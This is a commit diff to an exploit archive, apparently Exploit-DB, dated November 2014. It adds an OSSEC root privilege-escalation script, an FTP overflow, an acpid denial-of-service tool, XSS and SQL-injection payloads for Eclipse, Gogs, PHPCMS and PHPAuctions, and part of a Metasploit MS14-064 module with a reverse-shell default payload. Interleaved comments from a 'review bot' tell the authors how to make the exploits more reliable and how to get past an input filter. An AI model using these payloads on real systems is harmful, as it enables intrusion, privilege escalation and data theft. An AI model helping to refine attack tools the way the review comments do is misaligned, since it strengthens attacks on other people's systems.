Updated 11_16_2014

This commit is contained in:
Offensive Security 2014-11-16 04:49:47 +00:00
parent da2dbbdc68
commit 998a91f75a
14 changed files with 1247 additions and 6 deletions


@ -27668,7 +27668,7 @@ id,file,description,date,author,platform,type,port
30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0
30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0
30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0
@ -31218,7 +31218,7 @@ id,file,description,date,author,platform,type,port
34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include Vulnerability",2014-09-15,Vulnerability-Lab,ios,webapps,0
34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
34667,platforms/linux/shellcode/34667.c,"Connect Back Shellcode - 139 bytes",2014-09-15,MadMouse,linux,shellcode,0
34668,platforms/windows/remote/34668.txt,"Http File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
34668,platforms/windows/remote/34668.txt,"HFS HTTP File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
@ -31723,8 +31723,20 @@ id,file,description,date,author,platform,type,port
35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0
35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
35229,platforms/windows/remote/35229.html,"Internet Explorer <11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
35229,platforms/windows/remote/35229.html,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
35238,platforms/multiple/webapps/35238.txt,"Gogs (users and repos q pararm) - SQL Injection Vulnerabilities",2014-11-14,"Timo Schmid",multiple,webapps,0
35239,platforms/php/webapps/35239.txt,"PHPCMS 2008 V2 'data.php' SQL Injection Vulnerability",2011-01-17,R3d-D3V!L,php,webapps,0
35240,platforms/linux/dos/35240.c,"acpid 1.0.x Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0
35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 '.zip' File Buffer Overflow Vulnerability",2011-01-19,"C4SS!0 G0M3S",windows,remote,0
35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/searchView.jsp searchWord Parameter XSS",2008-04-24,Rob,multiple,remote,0
35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
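Review bot: The two new Gogs index entries (35237 and 35238) spell the parameter as `pararm`, a typo that will propagate into every search of this index; they should read `Gogs (label param) - SQL Injection` and `Gogs (users and repos q param) - SQL Injection Vulnerabilities`. The port column also disagrees between them, 80 for 35237 and 0 for 35238, although both advisories target the same HTTP service, so presumably both should carry 80. The HFS and Internet Explorer lines are title normalisations and need nothing.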


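--- a/platforms/linux/dos/35240.c
+++ b/platforms/linux/dos/35240.c
@@ -0,0 +1,76 @@
+source: http://www.securityfocus.com/bid/45915/info
+The 'acpid' daemon is prone to multiple local denial-of-service vulnerabilities.
+Successful exploits will allow attackers to cause the application to hang, denying service to legitimate users.
+acpid 1.0.10 is vulnerable; other versions may also be affected.
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/socket.h>
+#include <errno.h>
+#include <sys/un.h>
+#include <fcntl.h>
+#include <unistd.h>
+/* Tested on acpid-1.0.10 (Ubuntu 10.04) */
+int ud_connect(const char *name)
+{
+int fd;
+int r;
+struct sockaddr_un addr;
+fd = socket(AF_UNIX, SOCK_STREAM, 0);
+if (fd < 0) {
+perror("socket");
+return fd;
+}
+memset(&addr, 0, sizeof(addr));
+addr.sun_family = AF_UNIX;
+sprintf(addr.sun_path, "%s", name);
+r = connect(fd, (struct sockaddr *)&addr, sizeof(addr));
+if (r < 0) {
+perror("connect");
+close(fd);
+return r;
+}
+return fd;
+}
+int main(int argc, char *argv[])
+{
+int fd;
+char c;
+if (argc != 2) {
+fprintf(stderr, "Usage: prog fname\n");
+exit(1);
+}
+fd = ud_connect(argv[1]);
+if (fd < 0)
+exit(1);
+printf("\"Hanging\" socket opened, fd = %d\n", fd);
+fd = ud_connect(argv[1]);
+if (fd < 0)
+exit(1);
+printf("Normal socket opened, fd = %d\n", fd);
+while (1) {
+static int n;
+read(fd, &c, 1);
+fflush(stdout);
+if (c == '\n') {
+printf("%d messages in queue\n", ++n);
+}
+}
+}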
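Review bot: `sprintf(addr.sun_path, "%s", name)` in ud_connect copies argv[1] into the fixed-size `sun_path` buffer with no length check, so an over-long socket path overflows the stack frame of the tool itself; use `snprintf(addr.sun_path, sizeof addr.sun_path, "%s", name);` and refuse names that do not fit. `memset` is called without `#include <string.h>`, and the unchecked `read(fd, &c, 1);` in main spins at full speed on EOF or error while re-counting the stale `c`; `if (read(fd, &c, 1) <= 0) break;` keeps the message count honest and ends the loop when acpid goes away. The four description lines above the includes are not inside a comment, so the listing does not compile as pasted.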

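--- a/platforms/linux/local/35234.py
+++ b/platforms/linux/local/35234.py
@@ -0,0 +1,82 @@
+#!/usr/bin/python
+# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
+# Date: 14-11-14
+# Exploit Author: skynet-13
+# Vendor Homepage: www.ossec.net/
+# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
+# Version: OSSEC - 2.8
+# Tested on: Ubunutu x86_64
+# CVE : 2014-5284
+# Created from Research by
+# Jeff Petersen
+# Roka Security LLC
+# jpetersen@rokasecurity.com
+# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1
+# Run this on target machine and follow instructions to execute command as root
+from twisted.internet import inotify
+from twisted.python import filepath
+from twisted.internet import reactor
+import os
+import optparse
+import signal
+class HostDenyExploiter(object):
+def __init__(self, path_to_watch, cmd):
+self.path = path_to_watch
+self.notifier = inotify.INotify()
+self.exploit = cmd
+def create_files(self):
+print "=============================================="
+print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."
+for i in range(300, 65536):
+filename = "/tmp/hosts.deny.%s" % i
+f = open(filename, 'w')
+f.write("")
+f.close()
+def watch_files(self):
+print "=============================================="
+print "Monitoring tmp for file change...."
+print "ssh into the system a few times with an incorrect password"
+print "Then wait for up to 10 mins"
+print "=============================================="
+self.notifier.startReading()
+self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change])
+def write_exploit_to_file(self, path):
+print 'Writing exploit to this file'
+f = open(str(path).split("'")[1], 'w')
+f.write(' sshd : ALL : twist %s \n' % self.exploit)
+f.close()
+print "=============================================="
+print " ssh in again to execute the command"
+print "=============================================="
+print " End Prog."
+os.kill(os.getpid(), signal.SIGUSR1)
+def on_file_change(self, watch, path, mask):
+print 'File: ', str(path).split("'")[1], ' has just been modified'
+self.notifier.stopReading()
+self.write_exploit_to_file(path)
+if __name__ == '__main__':
+parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n")
+parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root')
+(options, args) = parser.parse_args()
+cmd = options.cmd
+if options.cmd is None:
+print parser.usage
+exit(0)
+ex = HostDenyExploiter('/tmp', cmd)
+ex.create_files()
+ex.watch_files()
+reactor.run()
+exit(0)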
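Review bot: `on_file_change` fires on the first inotify event anywhere under `/tmp`, not only on one of the `hosts.deny.N` files the script seeded: the `mask` argument is ignored and the path is never filtered, so any other process touching `/tmp` stops the notifier, writes the `twist` line into an unrelated file and ends the run before OSSEC has written anything. Guard the callback before `stopReading`, `if not path.basename().startswith('hosts.deny.'): return`. `str(path).split("'")[1]` recovers the file name by parsing the FilePath repr; `path.path` gives it directly. Ending via `os.kill(os.getpid(), signal.SIGUSR1)` relies on the default signal disposition to terminate the process, where `reactor.stop()` is the intended way out of the loop. The banner says `through /tmp/hosts.deny.65536` while `range(300, 65536)` stops at 65535.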


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45921/info
Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Eclipse IDE 3.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/advanced/searchView.jsp?searchWord=a");}alert('xss');</script>


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45921/info
Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Eclipse IDE 3.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/advanced/workingSetManager.jsp?operation=add&workingSet='%3E%3Cscript%20src%3D'http%3A%2F%2F1.2.3.4%2Fa.js'%3E%3C%2Fscript%3E
&hrefs=%2Fcom.adobe.flexbuilder.help.api%2Ftoc.xml&oldName=


@ -0,0 +1,186 @@
Blind SQL Injection in Gogs label search
========================================
Researcher: Timo Schmid <tschmid@ernw.de>
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
from [1])
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
unauthorized users.
Gogs provides a view to filter issues by labels. This view is accessible at
/<username>/<repository>/issues?labels=&type=&state=
The labels Parameter of this view is vulnerable to a blind SQL injection.
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
CVSS Base Score
===============
6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P)
CVE-ID
======
CVE-2014-8681
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
Status
======
Fixed by Vendor
Vulnerable Code Section
=======================
models/issue.go:
[...]
// GetIssues returns a list of issues by given conditions.
func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds,
sortType string) ([]Issue, error) {
sess := x.Limit(20, (page-1)*20)
if rid > 0 {
sess.Where("repo_id=?", rid).And("is_closed=?", isClosed)
} else {
sess.Where("is_closed=?", isClosed)
}
if uid > 0 {
sess.And("assignee_id=?", uid)
} else if pid > 0 {
sess.And("poster_id=?", pid)
}
if mid > 0 {
sess.And("milestone_id=?", mid)
}
if len(labelIds) > 0 {
for _, label := range strings.Split(labelIds, ",") {
sess.And("label_ids like '%$" + label + "|%'")
}
}
[...]
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. A attacker is restricted to not use commas in the
injection
string as the program splits input at commas.
Proof of Concept
================
Test of version string contains at least 10 characters:
http://www.example.com/user/repos/issues?label=' or
char_length(@@version) > 10
and '|%'='&type=all&state=
Returns all issues if true, non if false.
This could be used to extract data with a binary search.
Solution
========
This vulnerability could easily be fixed by using prepared statements:
sess.And("label_ids like ?", "%$" + label + "|%")
Update to Version 0.5.6.1025.
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1024-gf1d8746
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-10-25: Fixed by ensuring datatype of user input
2014-11-14: CVE-ID assigned
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1401.txt
Advisory-ID
===========
BC-1401
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
--
Timo Schmid
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
================== TROOPERS15 ==================
* International IT Security Conference & Workshops
* 16th - 20st March 2015 / Heidelberg, Germany
* www.troopers.de
====================================================
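Review bot: The proof of concept at `/user/repos/issues?label=' or char_length(@@version) > 10 and '|%'='` uses a `label` parameter, while the Description section gives the vulnerable view as `/<username>/<repository>/issues?labels=&type=&state=`; one of the two spellings is wrong, and a reader copying the PoC gets no injection at all if it is the PoC. The Severity Level says Critical beside a CVSS base score of 6.6, which the usual CVSSv2 bands place at Medium, so the two should be reconciled. The suggested one-line fix `sess.And("label_ids like ?", "%$" + label + "|%")` stops the injection but still lets `%` and `_` in a label act as LIKE wildcards; the vendor's actual fix recorded in the timeline (enforcing the data type of the label IDs) is the stronger remedy and deserves to be the recommended one.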


@ -0,0 +1,362 @@
Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
from [1])
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
unauthorized users.
Gogs provides an api view to give javascript code the possibility to
search for
existing repositories in the system. This view is accessible at
/api/v1/repos/search?q=<search query>.
The q Parameter of this view is vulnerable to SQL injection.
Exploitation Technique
======================
Remote
Severity Level
==============
Critical
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
CVE-ID
======
CVE-2014-8682
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
Status
======
Fixed by Vendor
Vulnerable Code Section
=======================
models/repo.go:
[...]
// SearchRepositoryByName returns given number of repositories whose name
contains keyword.
func SearchRepositoryByName(opt SearchOption) (repos []*Repository, err
error) {
// Prevent SQL inject.
opt.Keyword = FilterSQLInject(opt.Keyword)
if len(opt.Keyword) == 0 {
return repos, nil
}
opt.Keyword = strings.ToLower(opt.Keyword)
repos = make([]*Repository, 0, opt.Limit)
// Append conditions.
sess := x.Limit(opt.Limit)
if opt.Uid > 0 {
sess.Where("owner_id=?", opt.Uid)
}
if !opt.Private {
sess.And("is_private=false")
}
sess.And("lower_name like '%" + opt.Keyword + "%'").Find(&repos)
return repos, err
}
[...]
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.
Proof of Concept
================
Request:
http://www.example.com/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09
(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09
user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)
%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09
as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as
%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09
a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09
JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN
%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN
%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN
%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN
%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN
%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
Response:
{"data":[{"repolink":"bluec0re/test"},{"repolink":"bluec0re/secret"},{"repolink"
:"bluec0re/root@localhost"}],"ok":true}
Solution
========
This vulnerability could easily be fixed by using prepared statements:
sess.And("lower_name like ?", "%" + opt.Keyword + "%").Find(&repos)
Update to version 0.5.6.1105.
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
References
==========Update to version 0.5.6.1105.
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1402.txt
Advisory-ID
===========
BC-1402
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
Unauthenticated SQL Injection in Gogs user search
=================================================
Researcher: Timo Schmid <tschmid@ernw.de>
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
from [1])
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
unauthorized users.
Gogs provides an api view to give javascript code the possibility to
search for
existing users in the system. This view is accessible at
/api/v1/users/search?q=<search query>.
The q Parameter of this view is vulnerable to SQL injection.
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
CVE-ID
======
CVE-2014-8682
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
Status
======
Fixed by Vendor
Vulnerable Code Section
=======================
models/user.go:
[...]
// SearchUserByName returns given number of users whose name contains
keyword.
func SearchUserByName(opt SearchOption) (us []*User, err error) {
opt.Keyword = FilterSQLInject(opt.Keyword)
if len(opt.Keyword) == 0 {
return us, nil
}
opt.Keyword = strings.ToLower(opt.Keyword)
us = make([]*User, 0, opt.Limit)
err = x.Limit(opt.Limit).Where("type=0").And("lower_name like '%" +
opt.Keyword + "%'").Find(&us)
return us, err
}
[...]
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.
Proof of Concept
================
Request:
http://www.example.com/api/v1/users/search?q='/**/and/**/false)/**/union/**/
select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from
/**/mysql.db/**/where/**/('%25'%3D'
Response:
{"data":[{"username":"5.5.40-0ubuntu0.14.04.1","avatar":
"//1.gravatar.com/avatar/"}],"ok":true}
Solution
========
This vulnerability could easily be fixed by using prepared statements:
err = x.Limit(opt.Limit).Where("type=0").And("lower_name like ?", "%" +
opt.Keyword + "%").Find(&us)
Update to version 0.5.6.1105.
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1403.txt
Advisory-ID
===========
BC-1403
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
--
Timo Schmid
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
================== TROOPERS15 ==================
* International IT Security Conference & Workshops
* 16th - 20st March 2015 / Heidelberg, Germany
* www.troopers.de
====================================================
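Review bot: The user-search proof of concept at `/api/v1/users/search?q='/**/and/**/false)/**/union/**/select/**/null,null,@@version,...` depends on commas, yet the text above it states that since v0.5.6.1025-g83283b commas are filtered as well, so that request can only work on builds older than v0.5.6.1025 although the affected range runs to v0.5.6.1104; the repository-search PoC already uses the comma-free `JOIN (SELECT ...)` construction, and the user-search one should be rewritten the same way or annotated with its version limit. The References heading of the repository-search advisory reads `==========Update to version 0.5.6.1105.`, a line from the Solution section pasted into the underline. Both advisories cite CVE-2014-8682 for two different code paths, which is consistent if one identifier was assigned for both `q` parameters, but saying so once would keep a reader from suspecting a copy error. The repository-search response lists `bluec0re/secret`, which, if that repository is private, also shows the `is_private=false` filter being bypassed by the UNION; that consequence is worth stating in the Impact section rather than leaving it to the reader.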


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45913/info
PHPCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
PHPCMS 2008 V2 is vulnerable; other versions may also be affected.
http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()--


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45928/info
PHPAuctions is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/viewfaqs.php?cat=2 and substring(version(),1,1)=5

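--- a/platforms/windows/dos/35244.py
+++ b/platforms/windows/dos/35244.py
@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/45924/info
+Golden FTP Server is prone to a denial-of-service vulnerability.
+Exploits will cause the application to crash, denying service to legitimate users.
+Golden FTP Server 4.70 is vulnerable; other versions may also be affected.
+import socket
+import sys
+import time
+Bs = &#039;\x42&#039; * 4
+buffer = &#039;\x41&#039; * 533 + Bs + &#039;\xcc&#039; * 300
+if len(sys.argv) != 3:
+print "Usage: ./goldenftp.py <ip> <port>"
+sys.exit()
+ip = sys.argv[1]
+port = sys.argv[2]
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+print "[*] Sending evil buffer"
+s.connect((ip,int(port)))
+s.recv(1024)
+time.sleep(2)
+s.send(&#039;USER anonymous&#039;+ &#039;\r\n&#039;)
+s.recv(1024)
+time.sleep(3)
+s.send(&#039;PASS &#039; + buffer + &#039;\r\n&#039;)
+s.recv(1024)
+time.sleep(1)
+s.close()
+except:
+print "Can&#039;t Connect to Server"
+sys.exit()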
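Review bot: The bare `except:` around the whole exchange reports `Can't Connect to Server` for any failure, including the one the script is trying to provoke: if the server dies after the 837-byte PASS line, the following `s.recv(1024)` raises and the run is reported as a connection failure. Catch `socket.error as e` and print it, and keep only the `connect` inside that handler, so a crash after a successful login attempt is visible as such. The four prose lines above the imports are not commented and every quote is rendered as `&#039;`, so the listing is not runnable as pasted. The layout `'A' * 533 + 'BBBB' + '\xcc' * 300` looks like a return-address overwrite probe rather than a plain crash buffer; if so, the file is misfiled under dos and the impact is understated, which is worth confirming under a debugger.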

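--- a/platforms/windows/local/35235.rb
+++ b/platforms/windows/local/35235.rb
@@ -0,0 +1,151 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::FILEFORMAT
+include Msf::Exploit::EXE
+def initialize(info={})
+super(update_info(info,
+'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
+'Description' => %q{
+This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
+allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
+publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
+SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
+However, based on our testing, the most reliable setup is on Windows platforms running
+Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as
+those using Office 2010 SP1 may be less stable, and may end up with a crash due to a
+failure in the CPackage::CreateTempFileName function.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Haifei Li', # Vulnerability discovery and exploit technique
+'sinn3r', # Metasploit module
+'juan vazquez' # Metasploit module
+],
+'References' =>
+[
+['CVE', '2014-6352'],
+['MSB', 'MS14-064'],
+['BID', '70690'],
+['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm']
+],
+'Platform' => 'python',
+'Arch' => ARCH_PYTHON,
+'Targets' =>
+[
+['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}],
+],
+'Privileged' => false,
+'DefaultOptions' =>
+{
+'Payload' => 'python/meterpreter/reverse_tcp'
+},
+'DisclosureDate' => "Nov 12 2014",
+'DefaultTarget' => 0))
+register_options(
+[
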